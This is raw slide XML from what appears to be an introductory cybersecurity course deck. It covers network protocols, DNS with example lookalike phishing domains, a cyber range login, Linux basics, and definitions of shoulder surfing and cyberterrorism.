                  </a:txBody>
                  <a:tcPr>
                    <a:solidFill>
                      <a:schemeClr val="accent6">
                        <a:lumMod val="40000"/>
                        <a:lumOff val="60000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc hMerge="1">
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:endParaRPr lang="en-US" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="4005713962"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">
                <a:tc gridSpan="4">
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" b="1" dirty="0"/>
                        <a:t>Options</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr>
                    <a:solidFill>
                      <a:schemeClr val="accent6">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dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" b="1" dirty="0"/>
                        <a:t>Padding</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr>
                    <a:solidFill>
                      <a:schemeClr val="accent6">
                        <a:lumMod val="40000"/>
                        <a:lumOff val="60000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1863349589"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">
                <a:tc gridSpan="5">
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" b="1" dirty="0"/>
                        <a:t>Data</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr>
                    <a:solidFill>
                      <a:schemeClr val="accent6">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703040437"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="TextBox 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B6654BE4-BDE3-473E-A7B4-1B07B431F0D6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>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TCP Headers</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1587554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Protocols</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="TextBox 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="620414" y="1209583"/>
            <a:ext cx="9856839" cy="2554545"/>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Hypertext Transfer Protocol</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1"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HTTP is a protocol defined in the application layer that forms the basis for communication on the web.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1"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HTTP defines a number of functions that tell the remote system what you are requesting. For instance, GET, POST, and DELETE all interact with the requested data in a different way.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:custDataLst>
      <p:tags r:id="rId1"/>
    </p:custDataLst>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="21212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754326"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="1" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Shoulder Surfing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="1" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Physically watching the victim enter a PIN, password, or some other credential</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:custDataLst>
      <p:tags r:id="rId1"/>
    </p:custDataLst>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="16373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Protocols</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="TextBox 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="620414" y="1209583"/>
            <a:ext cx="9856839" cy="2246769"/>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File Transfer Protocol</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1"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FTP is also in the application layer and provides a way of transferring complete files from one host to another.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1"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It is inherently insecure, so it is not recommended for any externally facing network unless it is implemented as a public, download-only resource.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:custDataLst>
      <p:tags r:id="rId1"/>
    </p:custDataLst>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="328975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Protocols</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="TextBox 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="620414" y="1209583"/>
            <a:ext cx="9856839" cy="2246769"/>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Domain Name System</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1"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DNS is an application layer protocol used to provide a human-friendly naming mechanism for internet resources.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1"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It is what ties a domain name to an IP address and allows you to access sites by name in your browser.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="5" name="Table 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{04965014-4A35-4442-9363-FB8174CFC5F5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2326051267"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1180974" y="3788790"/>
          <a:ext cx="9719398" cy="2225040"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" bandRow="1">
                <a:tableStyleId>{073A0DAA-6AF3-43AB-8588-CEC1D06C72B9}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="5781141">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1097681756"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="3938257">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3242058498"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>Domain Name</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>IP Address</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2302773191"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>google.com</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" dirty="0">
                        <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>172.217.1.142</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" dirty="0">
                        <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="4089745052"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>gmail.com</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" dirty="0">
                        <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>172.217.14.165</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" dirty="0">
                        <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1307277653"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>amazon.com</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" dirty="0">
                        <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>176.32.98.166</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" dirty="0">
                        <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1180999562"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>big-sale.cheap-discount.amazon.com.go.biz</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" dirty="0">
                        <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>132.148.138.186</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" dirty="0">
                        <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="786112600"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>gmail-login.authenticated.gmail.com.hax.ru</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" dirty="0">
                        <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>91.195.240.93</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" dirty="0">
                        <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1909065216"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
    </p:spTree>
    <p:custDataLst>
      <p:tags r:id="rId1"/>
    </p:custDataLst>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="422232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10760CC-E78B-4034-B21C-1957DB35F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84" y="1213031"/>
            <a:ext cx="11266832" cy="5113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C850D65D-4695-4082-BF67-F9751A8DC24E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>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DNS Root Servers</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="11302200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Protocols</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="TextBox 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="620414" y="1209583"/>
            <a:ext cx="9856839" cy="2246769"/>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Secure Shell</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr fontAlgn="ctr"/>
            <a:endParaRPr lang="en-US" sz="2000" b="1"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SSH is an encrypted protocol implemented in the application layer that can be used to communicate with a remote server in a secure way.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1"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Many additional technologies are built around this protocol because of its end-to-end encryption and ubiquity.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:custDataLst>
      <p:tags r:id="rId1"/>
    </p:custDataLst>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="27952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Cyber Range</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3869514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Cyber Range</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{000B8E2C-972B-4B47-A1B0-656580791B21}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="855533" y="1424354"/>
            <a:ext cx="10480933" cy="4743835"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:custDataLst>
      <p:tags r:id="rId1"/>
    </p:custDataLst>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="56490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30212-FBC1-FE4A-9459-F5D2045044A7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2"/>
          <a:srcRect r="689"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="451761" y="1084650"/>
            <a:ext cx="6060494" cy="4284775"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="TextBox 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1F53C629-8D45-264B-A207-87D9064AC208}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6810649" y="1884330"/>
            <a:ext cx="1984967" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Username: student</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Password: student</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E5029F36-AA42-3140-B89B-4CC416092CEE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7803132" y="5369425"/>
            <a:ext cx="3190737" cy="554019"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Right Arrow 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0EDB72D7-C6EC-554E-B7DF-FA83E4452A71}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="8177766">
            <a:off x="8642946" y="5132908"/>
            <a:ext cx="760273" cy="29122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1C2765-A1C4-C046-A4A7-E4C44C97E397}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8704429" y="4586017"/>
            <a:ext cx="994503" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Terminal</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="33167390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Linux Intro</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1026" name="Picture 2" descr="https://upload.wikimedia.org/wikipedia/commons/a/af/Tux.png">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{154E7C88-6E3E-4F7A-86A2-444BFF63E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2896" y="2413337"/>
            <a:ext cx="252412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509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Intro</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="TextBox 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="620414" y="1209583"/>
            <a:ext cx="9856839" cy="3600986"/>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What is Linux?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2400" b="1" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Arial"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Unix-like computer operating system assembled under the model of free and open-source software development and distribution. (GNU)</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These operating systems share the Linux Kernel.</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Comes in several “distributions” to serve different purposes.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Originally written by Linus Torvalds. Now almost 10,000 developers including major technology companies like Intel and IBM.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CDB9EA9E-28AF-44CE-8411-0D44CDD1ABE5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3"/>
          <a:srcRect r="439"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1982842" y="5525559"/>
            <a:ext cx="8250377" cy="895350"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:custDataLst>
      <p:tags r:id="rId1"/>
    </p:custDataLst>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="32315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Intro</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="TextBox 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="620414" y="1209583"/>
            <a:ext cx="9856839" cy="4524315"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Where is Linux?</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World Wide Web</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67% of the world’s web-servers run Linux (2016)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1"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Research/High-Performance Compute</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Google, Amazon, NSA, 100% of TOP500 Super-computers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1"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Modern Smartphones and devices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Android phone</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Amazon Kindle</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Smart TVs/Devices</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" b="1"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296856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754326"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="1" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Cyberterrorism</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="1" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Use of cyber attacks to inflict panic, chaos, or undermine a community</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:custDataLst>
      <p:tags r:id="rId1"/>
    </p:custDataLst>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
